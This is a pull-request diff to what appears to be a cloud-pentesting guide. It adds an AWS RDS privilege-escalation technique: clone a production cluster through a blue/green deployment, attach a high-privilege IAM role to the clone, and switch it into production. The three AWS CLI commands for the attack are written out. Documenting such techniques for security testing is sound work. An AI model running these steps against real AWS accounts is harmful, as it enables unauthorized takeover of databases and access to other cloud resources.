Merge pull request #242 from ryotaromatsui/rds-CreateBlueGreenDeployment_passrole_privsc

arte-ryotaro

src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc/README.md

@@ -166,6 +166,27 @@ aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-
 
 **Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance.
 
+### `rds:CreateBlueGreenDeployment`, `rds:AddRoleToDBCluster`, `iam:PassRole`, `rds:SwitchoverBlueGreenDeployment`
+
+An attacker with these permissions can clone a production database (Blue), attach a high-privilege IAM role to the clone (Green), and then use switchover to replace the production environment. This allows the attacker to elevate the database's privileges and gain unauthorized access to other AWS resources.
+
+```bash
+# Create a Green deployment (clone) of the production cluster
+aws rds create-blue-green-deployment \
+    --blue-green-deployment-name <name> \
+    --source <production-db-cluster-arn>
+
+# Attach a high-privilege IAM role to the Green cluster
+aws rds add-role-to-db-cluster \
+    --db-cluster-identifier <green-cluster-id> \
+    --role-arn <high-privilege-iam-role-arn>
+
+# Switch the Green environment to Production
+aws rds switchover-blue-green-deployment \
+    --blue-green-deployment-identifier <deployment-id>
+```
+**Potential Impact**: Full takeover of the production database environment. After the switchover, the database operates with elevated privileges, allowing unauthorized access to other AWS services (e.g., S3, Lambda, Secrets Manager) from within the database.
+
 {{#include ../../../../banners/hacktricks-training.md}}